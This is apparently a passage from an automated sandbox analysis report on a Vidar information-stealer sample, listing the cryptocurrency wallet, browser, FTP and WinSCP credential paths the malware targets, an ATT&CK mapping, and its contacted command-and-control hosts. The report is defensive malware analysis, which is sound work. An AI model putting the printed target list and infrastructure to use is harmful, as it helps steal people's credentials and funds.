Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
                              Tries to harvest and steal Bitcoin Wallet information
                              Source: C:\Users\user\Desktop\out.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                              Source: C:\Users\user\Desktop\out.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Tries to harvest and steal ftp login credentials
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                              Tries to steal Crypto Currency Wallets
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                              Source: Yara matchFile source: Process Memory Space: out.exe PID: 1396, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Yara detected Vidar
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Yara detected Vidar stealer
                              Source: Yara matchFile source: out.exe, type: SAMPLE
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 0.2.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: out.exe PID: 1396, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C600C40 sqlite3_bind_zeroblob,0_2_6C600C40
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C600D60 sqlite3_bind_parameter_name,0_2_6C600D60

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                              Windows Management Instrumentation                              		1
                              DLL Side-Loading                              		221
                              Process Injection                              		1
                              Masquerading                              		2
                              OS Credential Dumping                              		2
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		21
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Native API                              		Boot or Logon Initialization Scripts1
                              DLL Side-Loading                              		1
                              Virtualization/Sandbox Evasion                              		1
                              Credentials in Registry                              		151
                              Security Software Discovery                              		Remote Desktop Protocol4
                              Data from Local System                              		2
                              Ingress Tool Transfer                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)221
                              Process Injection                              		Security Account Manager1
                              Virtualization/Sandbox Evasion                              		SMB/Windows Admin SharesData from Network Shared Drive3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                              Deobfuscate/Decode Files or Information                              		NTDS12
                              Process Discovery                              		Distributed Component Object ModelInput Capture114
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                              Obfuscated Files or Information                              		LSA Secrets1
                              Application Window Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              Software Packing                              		Cached Domain Credentials1
                              Account Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              DLL Side-Loading                              		DCSync1
                              System Owner/User Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem4
                              File and Directory Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow55
                              System Information Discovery                              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              out.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\freebl3.dll0%ReversingLabs
                              C:\ProgramData\mozglue.dll0%ReversingLabs
                              C:\ProgramData\msvcp140.dll0%ReversingLabs
                              C:\ProgramData\nss3.dll0%ReversingLabs
                              C:\ProgramData\softokn3.dll0%ReversingLabs
                              C:\ProgramData\vcruntime140.dll0%ReversingLabs

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                              https://player.vimeo.com0%URL Reputationsafe
                              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
                              https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                              https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                              http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                              http://cowod.hopto.org_DEBUG.zip/c0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                              https://steam.tv/0%URL Reputationsafe
                              https://t.me/ae5ed100%URL Reputationmalware
                              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
                              https://mozilla.org0/0%URL Reputationsafe
                              http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                              https://store.steampowered.com/points/shop/0%URL Reputationsafe
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                              https://www.ecosia.org/newtab/0%URL Reputationsafe
                              https://lv.queniujq.cn0%URL Reputationsafe
                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                              https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                              https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                              https://checkout.steampowered.com/0%URL Reputationsafe
                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                              https://store.steampowered.com/;0%URL Reputationsafe
                              https://store.steampowered.com/about/0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
                              https://help.steampowered.com/en/0%URL Reputationsafe
                              https://store.steampowered.com/news/0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/0%URL Reputationsafe
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                              http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
                              https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                              https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%URL Reputationsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              steamcommunity.com
                              		104.102.49.254
                              		truetrue
                                		unknown
                                cowod.hopto.org
                                		45.132.206.251
                                		truetrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://49.12.106.214/mozglue.dlltrue
                                    		unknown
                                    https://49.12.106.214/true
                                      		unknown
                                      https://49.12.106.214/nss3.dlltrue
                                        		unknown
                                        https://49.12.106.214/softokn3.dlltrue
                                          		unknown
                                          https://49.12.106.214/freebl3.dlltrue
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://49.12.106.214/softokn3.dllEout.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
